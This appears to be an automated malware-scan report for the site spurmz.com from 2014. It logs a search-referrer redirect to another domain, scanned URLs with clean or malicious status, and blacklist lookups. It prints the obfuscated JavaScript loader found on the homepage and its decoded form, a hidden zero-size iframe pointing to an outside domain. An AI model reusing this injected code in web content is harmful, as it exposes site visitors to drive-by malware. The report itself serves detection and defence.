Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://spurmz.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: spurmz.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 02 Sep 2014 13:22:21 GMT Location: http://mediccan.ru/ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.25 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 Content-Length: 375 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://spurmz.com/ | 200 OK Content-Length: 9488 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var s=' N h uo e i P kXW" 3 1 1 5 1 0 0 2 5 M kXW v 4 O 9 8 0 0 6 9 8 7 8 M kXW,0 1 5 6 8 2 2 0 5 M kXW v 6 O 9 5 9 3 7 4 2 1 1 M kXW v 70 6 3 9 8 1 6 2 1 M kXW\'9 6 5 6 1 5 8 7 4 M v d u j b wv . lo i w ( \' N { xh b w h g uO zE e L / / t d ds | d c w . u d . u u / y d . e z e Q h {" 3 " l {$ zO 2 " z w { y zC " 2 " a { yt " a w x] P N / { xh b w P \' ) M N / h uo e i P';
var t=' d=atnr68;i93"',cn=18,rn=2; function re(s,n,r,b,e){if(s<b||s>e)return s;s-=r;if(s<b)s+=n;return s;} var i = 0,sx=""; while(i<s.length){var ch=s.charAt(i); var c,i1,i2; if(ch==" "){c = s.charAt(i+1);i1=s.charCodeAt(i+1);if(i1<127)c = String.fromCharCode(re(re(re(i1,33,cn,58,90),29,cn,97,125),10,rn,48,57));i++;} else{c=s.charCodeAt(i);if(c<127)c = re(re(re(c,33,cn,58,90),29,cn,97,125),10,rn,48,57);i1 = c>>4; i2 = (c-i1*16);c = t.charAt(i1-1)+""+t.charAt(i2);} i++;if(c==" ")c = "\n";sx+=c;}document.write(sx); Decoded script: var rand=199398803;var rand2=768847656;var rand3=893460083;var rand4=737152099;var rand5=841769409;var rand6=643493652;document.write('<iframe src="http://boondjone.co.cc/go.php?sid=1" width="0" height="0" align="left"></iframe>'); Antivirus reports:
| ||
http://howhigh.xz.lt/pub/counter.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://www.serveriai.lt/talpinimas.html | 200 OK Content-Length: 9936 Content-Type: text/html | clean |
http://www.serveriai.lt/ | 200 OK Content-Length: 7661 Content-Type: text/html | clean |
http://www.serveriai.lt//www.iv.lt/jquery/js/jquery.js/ | HTTP/1.1 302 Found Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.serveriai.lt/test404page.js | HTTP/1.1 302 Found Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.serveriai.lt//www.iv.lt/jquery/js/notice.jquery.js/ | HTTP/1.1 302 Found Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.serveriai.lt//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 302 Found Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.serveriai.lt//www.iv.lt/statistika.php?type=last_order&service=svetain%EBs+talpinimas+ir+el.+pa%F0tas/ | HTTP/1.1 302 Found Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://howhigh.xz.lt//www.iv.lt/dokumentai/talpinimas.pdf/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/srautas.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/vieta.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/pastas.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/php.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/mysql.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/multi-domain.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/programos.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/apsauga.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/ssl.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/kopijos.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/akcija.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/garantija.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/neribojami.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/didmenininkams.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/profesionalus.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/demo/user.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/talpinimas.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/domenai.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/klientams.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/pirkti.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://actchaya.com/test/is.js | 404 Not Found Content-Length: 469 Content-Type: text/html | clean |
http://www.reconstructing.me/is.js | 200 OK Content-Length: 1557 Content-Type: text/html | clean |
http://mondodesign.ro/sll/is.js | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=spurmz.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://spurmz.com/
Result: spurmz.com is not infected or malware details are not published yet.
Result: spurmz.com is not infected or malware details are not published yet.